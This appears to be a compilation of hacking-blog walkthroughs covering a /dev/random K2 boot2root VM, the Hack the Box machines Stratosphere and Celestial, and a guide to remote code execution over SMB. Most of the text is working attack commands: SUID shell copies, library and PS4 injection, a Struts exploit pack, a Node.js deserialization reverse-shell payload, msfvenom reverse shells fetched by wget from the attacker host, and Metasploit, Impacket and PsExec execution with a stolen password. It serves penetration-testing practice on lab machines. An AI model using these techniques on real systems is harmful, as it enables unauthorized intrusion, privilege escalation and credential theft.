Hack the /dev/random: K2 VM (boot2root)

Hello friends! Today we are going to take another CTF challenge known as /dev/random: k2. The credit for making this vm machine goes to “Sagi-” and it is another boot2root challenge in which our goal is to get root to complete the challenge. You can download this VM here.

Let us start form getting to know the IP of VM (Here, I have it at 192.168.199.138 but you will have to find your own

Netdiscover

We use the given credential to login through ssh. After loggin in we check the sudoers list and find that we can run /bin/calc as user “user2”.

ssh user@192.168.199.138

sudo -l

We use strace to debug the binary and if there are missing files or dependencies. We find there is a shared object file missing in /home/user/.config/ directory called libcalc.so.

strace /bin/calc 2>&1 | grep -i -E “open|access”

We check /home directory and find that the user directory has all permission for the owner only. We give read and execute permission to users in the same group and others. Then we created a directory called .config so that we can create our shared object inside it.

We created a binary that copy’s /bin/bash into /tmp directory, give it suid permission and run it.

We save the file as libcalc.c, then we compile and run the /bin/calc as user2. As soon as we run the application we check the id and find that we have successfully spawned a shell as user2.

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

sudo -u user2 /bin/calc

After spawning a shell as user2 we try to enumerate the machine and find that there is cronjob that runs a file called /sbin/bckup for user3.

We check the content of this file and find that it is a ruby script that creates a zip file in /tmp/ directory.

We check the zip library of that this ruby is using and find that we can write the file.

We change the content of the file and add that bash command to copy /bin/bash and save it in /tmp/ directory as bash2 and set suid bit.

echo ‘`cp /bin/bash /tmp/bash2 && chmod +s /tmp/bash2`’ > /usr/local/share/gems/gems/rubyzip-1.2.1/lib/zip.rb

We wait for some time and go to the /tmp/ directory. After changing the directory, we find bash2 has been created by user3. We run the new bash file and successfully spawn a shell as user3.

As we effective user id and not the actual used id of user3. We create a c program that spawns a shell as user3’s uid and gid.

We compile the program and run it. After running the program, we successfully spawn a shell with user3’s uid and gid.

gcc bash3.c -o bash3

Now we try find files with suid bit set and find a file called “whoisme” is “/usr/bin/local/” directory.

find / -perm -4000 2>/dev/null

When we run the file it outputs the string “user”. When we check binary file with strings command we find that it runs setuid, system, setgid and logname command.

We run by ignoring the enviroment we use PS4 variable to copy /bin/bash in /tmp/ directory as bash4 and change the ownership to root and set suid bit and run it along the binary file.

env -i SHELLOPTS=xstrace PS4=’$(cp /bin/bash /tmp/bash4 && chown root.root /tmp/bash4 && chmod +s /tmp/bash4)’ /bin/sh -c  ‘/usr/local/bin/whoisme’

As soon as we run the file we find our copied bash file. We run the file and spawn a shell as root user. We go to root directory and a file called flag.txt.

We take a look at the content of the file and find our congratulatory flag.

Hack the Box: StratosphereWalkthrough

Hello friends!! Today we are going to solve another CTF challenge “Stratosphere” which is lab presented by Hack the Box and is available online for those who want to increase their skill in penetration testing and black box testing. Stratosphereis retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: find user.txt and root.txt file in victim’s machine.

WalkThrough

Since these labs are online available therefore they have static IP. The IP of Stratosphereis 10.10.10.64

Let’s start off with scanning the network to find our target.

nmap -sV 10.10.10.64

As per nmap port 80 is open for HTTP let’s explore the target IP in the browser. After exploring port 80, we was welcomed by following page where we didn’t found any informative clue. 

After then we visit Port 8080 for HTTP proxy and here also we get same web page. We try to inspect source code of port 80 and 8080 but we got nothings.

Therefore next we decided to have directory brute force attack with help of Dirbuster and used wordlist “dictionary-list-2.3-medium.txt” for the attack.

Luckily it fetched some web directories such as /Monitoring, let’s explore it in the web browser.   

So when we try to open the URL http://10.10.10.64:8080/Monitoring then it gets redirect to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I closely look at the URL containing .action extension, so I made Google search to extract complete information related to this extension. I found action extension is utilized by apache struts2 which has a history of bugs and vulnerabilities and if you will search for its exploit, you will get lot of python scripts and exploits to compromise this service.

So we used nmap script to identify its state of vulnerability

nmap -p8080 --script http-vuln-cve2017-563 --script-args path=/Monitoring/ 10.10.10.64

Awesome!!! It is vulnerable to cve2017-563, let’s exploit it.

I found an exploit Struts-Apache-ExploitPack , lets download it from git hub and give full permission.

cd git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git

cd Struts-Apache-ExploitPack

cd Exploiter

ls

chmod 777 Exploit.sh

Now run the following command to exploit the victim machine.

./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action

id

ls

cat db_connect

Username: admin

Password: admin

So now we have database credential, let’s utilized them for getting all information from inside the database. 

mysqldump -u admin -padmin --all-databases --skip-lock-tables

Here I found Password “9tc*rhKuG5TyXvUJOrE^5CK7k” for user Richard, now let’s try to connect with SSH using these credential.

ssh richard@10.10.10.64

Yuppie we successfully logged in victim’s machine, so now let get the user.txt and root.txt

ls

cat user.txt

cat test.py

Here we notice that test.py was computing some hash values and at the end it will give success.py from inside the root directory and whole script is depends upon hashlib. 

Then we also check sudo rights for Richard and found he has sudo right to run all type of python script. So very first we check test.py file and start solving hashes in order to get success.py

sudo /usr/bin/python /home/richard/test.py

So we got the hash value, now we need to decode it and after decoding I found “kayboo!”

On submitting the decoded text, it generated a new hash for further step and again I decode it and submit the answer and after then again a new hash and it was processing repetitively same at each time on submitting decoded text.

Since test.py was importing hashlib which was a python library so I last option was python library hijacking to escalate the root privilege.    

Therefore I create a hashlib.py script in the current directory to import system binary ‘/bin/bash’ and hence now when we will run test.py then it will import hashlib.py which will calls /bin/bash binary file.

echo 'import os;os.system("/bin/bash")' > hashlib.py

sudo /usr/bin/python /home/richard/test.py

Booom!!! Here we owned root access, now let’s get the root.txt file and finish this task.

Multiple ways to Connect Remote PC using SMB Port

In this article, we will learn how to connect with victim’s machine via SMB port 445, once you have collected username and password to your victim’s PC. To know how collect username and passwords to your remote host via SMB protocol click here and to understand what is SMB protocol, click here

Table of content

Exploiting Windows Server 2008 R2 via SMB through Metasploit inbuilt exploits:

§  Microsoft Windows Authenticated User Code Execution

§  Microsoft Windows Authenticated Powershell Command Execution

§  Microsoft Windows Authenticated Administration Utility

§  SMB Impacket WMI Exec

Third party Tools

§  Impacket (psexec)

§  Impacket (atexec)

§  Psexec exe

§  Atelier Web Remote Commander

Exploiting Windows 2007 via SMB through Metasploit inbuilt exploits:

§  MS17-010 EternalRomance SMB Remote code execution

§  MS17-010 EternalRomance SMB Remote command execution

Let’s Begin

Tested on: Winodows Server2008 R2

Attacking Machine: Kali Linux

Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

 msf > use exploit/windows/smb/psexec

msf exploit windows/smb/psexec) > set rhost 192.168.1.104

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass Ignite@123

msf exploit(windows/smb/psexec) > exploit

Here,

rhost –> IP of victim PC

smbuser –> username

smbpass –> password

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the “psexec” utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.

 msf > use exploit/windows/smb/psexec_psh

msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.104

msf exploit(windows/smb/psexec_psh) > set smbuser administrator

msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123

msf exploit(windows/smb/psexec_psh) > exploit

Once again as the commands run you will gain a meterpreter sesion of victim’s PC. And therefore, you can do as you wish.

Microsoft Windows Authenticated Administration Utility

This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique than the "psexec" utility provided by SysInternals. Daisy chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine.

Thus first, in a new metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on host.

use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 3

msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106

msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for malicious dll code.

msf > use auxiliary/admin/smb/psexec_command

msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.1.104

msf auxiliary(admin/smb/psexec_command) > set smbuser administrator

msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123

msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]

msf auxiliary(admin/smb/psexec_command) > exploit

As soon as we run psexec auxiliary we will get meterpreter session with as administrator.

SMB Impacket WMI Exec

This module is similar approach to psexec but executing commands through WMI.

msf > use auxiliary/scanner/smb/impacket/wmiexec

msf auxiliary(scanner/smb/impacket/wmiexec) >

msf auxiliary(scanner/smb/impacket/wmiexec) >

msf auxiliary(scanner/smb/impacket/wmiexec) >

msf auxiliary(scanner/smb/impacket/wmiexec) >

Impacket for Psexec.py

Psexec.py lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.

Now let’s install the Impacket tools from GitHub. You can get it from here. Firstly, clone the git, and then install the Impacket and then run psexec.py to connect victim’s machine.

git clone https://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

cd examples

Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]

./psexec.py SERVER/Administrator:Ignite@192.168.1.104

Impacket for Atexec.py

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

Syntax: /atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]

./atexec.py SERVER/Administrator:Ignite123@192.168.1.140 systeminfo

As you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.

PsExec.exe

Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from –> http://download.sysinternals.com/files/PSTools.zip.

Unzip the file once you have downloaded it. Go to you command prompt and type:

PsExec.exe\\192.168.1.104 -u administrator -p Ignite@123 cmd

Here,

192.168.1.104 –> is the IP of remote host

-u –> denotes username

-p –> denotes password

cmd –> to enter victim’s command prompt

Atelier Web Remote Commander

This is graphical software that let us gain control of victim’s PC that too quite easily.

Once you have open the software give the IP address of your victim’s PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim’s PC’s screen will appear on your Desktop and you will have pretty good view of what your victim is doing.

As you can observe we are having Screen of victim’s machine in front of us.

MS17-010 EternalRomance SMB Remote code Execution

Tested on: Winodows 2007 ultimate

Attacking Machine: Kali Linux

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

msf > use exploit/windows/smb/ms17_010_psexec

msf exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.105

msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj

msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123

msf exploit(windows/smb/ms17_010_psexec) > exploit

MS17-010 EternalRomance SMB Remote Command Execution

This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.

Thus first, in a new metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on host.

use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 3

msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106

msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for malicious dll code.

msf > use auxiliary/admin/smb/ms17_010_command

msf auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.1.105

msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj

msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123

msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]

msf auxiliary(admin/smb/ms17_010_command) > exploit

As soon as we run psexec auxiliary we will get meterpreter session with as administrator.

In this way we can compromise victim’s machine remotely if we have login credential.

Happy Hacking!!!!

Hack the Box: Celestial Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Celestial” which is lab presented by Hack the Box and is available online for those who want to increase their skill in penetration testing and black box testing. Celestial is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

WalkThrough

Since these labs are online available therefore they have static IP. The IP of Celestial is 10.10.10.85 

Let’s start off with scanning the network to find our target.

nmap -A 10.10.10.85

The NMAP output shows us that the port TCP 3000 is opened on the target machine  Let’s try to access the website on a Non-standard HTTP port (3000) as follows :

Browse to http://10.10.10.85:3000 and we will be greeted with the following page

As we didn’t find any other clue to move forward after navigating through many other possibilities; we quickly moved further to understand the website request via Burpsuite tool. Therefore, upon capturing the webpage’s GET request, we noticed the profile= Cookie parameter (highlighted in red)

Copy the entire value inside the profile= cookie parameter and paste it in the Burpsuite decoder .

eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D

On decoding the same we will get the output in base64 format . Once again , we will decode the base64 format output and would be able to see the results in clear text format. The output displays username and other details of a specific user This is an indication that we can insert our code in the cookie profile parameter value to get the desired results.

On further investigation , we came to know that this is a Node JS deserialization bug for the purpose of remote code execution . Further details of the same are mentioned in the below website .If we read the entire content of the website , we will observe that there is a function which contains a particular string comprising of multiple numeric values.

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

Copy the entire numeric content (after String.fromCharCode) starting from 10 till 10 . Navigate to the URL https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html and convert Decimal to ASCII as shown in the screenshot below

Now let’s change the contents of the ASCII text and replace the HOST and PORT parameter details with the HOST=10.10.14.3 and PORT= 4444, where 10.10.14.3 is our Kali machine IP . Once done, we will get the equivalent output in the Decimal format as shown below

Copy the decimal output from the above screenshot starting from 118 and ending with 10, with each number , separated by a comma.

Note : As we can see that the decimal output in the above output is separated by a space , hence we need to either do it manually OR need to refer to the following Python script method so as to include the comma values , before proceeding further

https://github.com/Sayantan5/Holiday/blob/master/encode.py

Once the decimal output (separated by comma) is ready , we need to now paste it inside the code shown below (replace the value with decimal output) and perform the Base64 encode of the same

echo {"username":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(value) )}()"} | base64 -w0

Copy the encoded output above and paste it in front of the Profile= parameter of the Burpsuite as shown in the image below.

Once done we need to click on the Forward option , in Burpsuite Intercept tab

Note : Before forwarding the modified content in Burpsuite , we should setup the netcat listener in Kali machine and keep it ready .

nc -lvp 4444

In order to access proper TTY shell , we had imported python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

Hurray !! We got into the reverse shell of the target machine

Lets have a quick look at the contents

ls

We navigated to many folders , however found interesting stuff in the Documents folder

cd Documents

Here we can see that there is a user.txt file , lets read it contents

cat user.txt

Finally , we got our first flag i.e  output of user.txt file 

Now upon further navigation , we also opened the script.py file because of our curiosity to examine the contents of the same . If we do cat script.py , the output displays as print “Script is running”

cat script.py

print “Script is running..”

Note : This is an indication that we may need to examine the log files to see which script is running and if it is running on a periodic basis

The best step to move forward is to examine the contents of the log directory in var

cd /var/log

Let’s see the files listed over here

ls

As we can see that there are multiple syslog files being generated in this folder . The old logs are being zipped and numbered accordingly .The latest logs are always stored in the log file named syslog .So we will open the contents of the syslog file and try to find out if there is something interesting going on.

cat syslog

We will notice that there is a cronjob running every 5 minutes , which is copying the output of script.py file (in the home/sun/Documents folder) to the output.txt file

Now we can try to put our own content in the script.py file . For this let’s generate a Reverse shell with the following command

msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=1234 R

Copy the contents of msfvenom output and save it on Kali Desktop named as script.py ,which will be further used in the subsequent steps

Now run the web server on the Kali machine

python –m SimpleHTTPServer 80

Lets read the contents of the script.py .The output displays as print “Script is running..”

cat script.py

Lets move this original python script (script.py) by renaming it to script.py.original as shown below

mv script.py script.py.original

Download our newly created script.py from the Kali machine Desktop

wget http://10.10.14.3/script.py

Open a netcat reverse shell

nc -lvp 1234

In order to access proper TTY shell , we had imported python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

Hurray!! We got into the root

Navigate to the root directory

cd /root

Let’s see what content it has .

ls

As we can see it contains 2 files root.txt and script.py . Lets open root.txt file

cat root.txt

Wonderful!! We have gained access to both user.txt and root.txt files and hacked this box.